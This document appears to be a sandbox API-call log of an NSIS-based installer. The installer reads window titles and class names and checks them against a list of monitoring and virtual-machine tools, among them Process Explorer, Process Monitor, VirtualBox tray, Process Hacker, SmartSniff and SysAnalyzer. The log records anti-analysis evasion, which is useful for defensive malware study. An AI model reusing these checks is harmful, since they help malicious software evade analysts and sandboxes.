lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.454] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.454] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: 
lpString1="strstr") returned="strstr" [0158.454] lstrcpynA (in: lpString1=0x341200, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.454] lstrcpynA (in: lpString1=0x340df8, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.454] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.454] lstrcpynA (in: lpString1=0x3401e0, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.454] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.454] strstr (_Str="Network Flyout", _SubStr="sysinternals") returned 0x0 [0158.454] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.454] lstrcpynA (in: lpString1=0x341200, lpString2="Network Flyout", iMaxLength=1024 | out: lpString1="Network Flyout") returned="Network Flyout" [0158.454] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.454] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.454] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.454] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.454] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.455] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.455] lstrlenA (lpString="0") returned 1 [0158.455] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.455] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: 
lpString1="3399936") returned="3399936" [0158.455] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.455] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.455] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.455] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.455] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.455] lstrlenA (lpString="0") returned 1 [0158.455] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.455] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.455] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.455] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.455] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.455] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.455] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.455] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.455] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.455] lstrlenA (lpString="3399936") returned 7 [0158.455] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.456] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.456] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.456] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.456] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.456] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.456] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.456] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.456] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: 
param_1="callback1") returned 9 [0158.456] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.456] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65848") returned 5 [0158.456] lstrcpyA (in: lpString1=0x430400, lpString2="65848" | out: lpString1="65848") returned="65848" [0158.456] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.456] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.456] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.457] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.457] lstrlenA (lpString="callback1") returned 9 [0158.457] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.457] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.457] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.457] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.457] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.457] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.457] lstrcmpiA 
(lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.457] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.457] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.457] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.457] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.457] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.457] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.457] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.457] GetModuleHandleA 
(lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.457] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.458] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.458] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.458] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.458] lstrcpynA (in: lpString1=0x341200, lpString2="65848", iMaxLength=1024 | out: lpString1="65848") returned="65848" [0158.458] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.458] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.458] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.458] GetWindowTextA (in: hWnd=0x10138, lpString=0x340df8, nMaxCount=1024 | out: lpString="Task Switching") returned 14 [0158.458] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.458] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.458] lstrcpyA (in: lpString1=0x430800, lpString2="Task Switching" | out: lpString1="Task Switching") returned="Task Switching" [0158.458] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65848") returned 5 [0158.458] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.458] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.458] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.458] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.459] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.459] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.459] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.459] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.459] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.459] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.459] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.459] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.459] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.459] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.459] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.459] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.459] lstrcpynA (in: lpString1=0x340df8, lpString2="65848", iMaxLength=1024 | out: lpString1="65848") returned="65848" [0158.460] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.460] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.460] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.460] GetClassNameA (in: hWnd=0x10138, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="TaskSwitcherWnd") returned 15 [0158.460] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.460] lstrcpynA (in: lpString1=0x341200, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] lstrcpyA (in: lpString1=0x430c00, lpString2="TaskSwitcherWnd" | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65848") returned 5 [0158.460] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.460] lstrlenA (lpString="0") returned 1 [0158.460] lstrcpynA 
(in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.460] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.460] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="PROCEXPL") returned 1 [0158.460] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.460] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.460] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.460] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.460] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.460] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.461] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="VBoxTrayToolWndClass") returned -1 [0158.461] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] 
lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.461] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.461] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="VMSwitchUserControlClass") returned -1 [0158.461] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.461] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.461] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.461] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.461] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.461] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="SmartSniff") returned 1 [0158.461] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.461] lstrcpynA (in: 
lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.461] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="ProcessHacker") returned 1 [0158.461] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.461] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.461] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.461] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.461] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.461] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.462] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="SysAnalyzer") returned 1 [0158.462] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.462] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.462] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: 
lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.462] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.462] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="VMSwitchUserControlClass") returned -1 [0158.462] lstrcpynA (in: lpString1=0x42e3a0, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.462] lstrlenA (lpString="TaskSwitcherWnd") returned 15 [0158.462] lstrcpynA (in: lpString1=0x40ac18, lpString2="TaskSwitcherWnd", iMaxLength=1024 | out: lpString1="TaskSwitcherWnd") returned="TaskSwitcherWnd" [0158.462] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.462] lstrcmpiA (lpString1="TaskSwitcherWnd", lpString2="ProcessHacker") returned 1 [0158.462] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.462] lstrlenA (lpString="Task Switching") returned 14 [0158.462] lstrcpynA (in: lpString1=0x40ac18, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.462] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.462] lstrcmpiA (lpString1="Task Switching", lpString2="0") returned 1 [0158.462] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.462] lstrlenA (lpString="Task Switching") returned 14 [0158.462] lstrcpynA (in: lpString1=0x33723c, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.462] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main 
thread" [0158.462] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.462] lstrlenA (lpString="3399936") returned 7 [0158.462] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.462] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.462] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.462] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.462] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.463] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.463] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.463] lstrcpynA (in: lpString1=0x337684, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.463] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrlenA (lpString="") returned 0 [0158.463] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.463] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrcpynA (in: lpString1=0x337acc, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" 
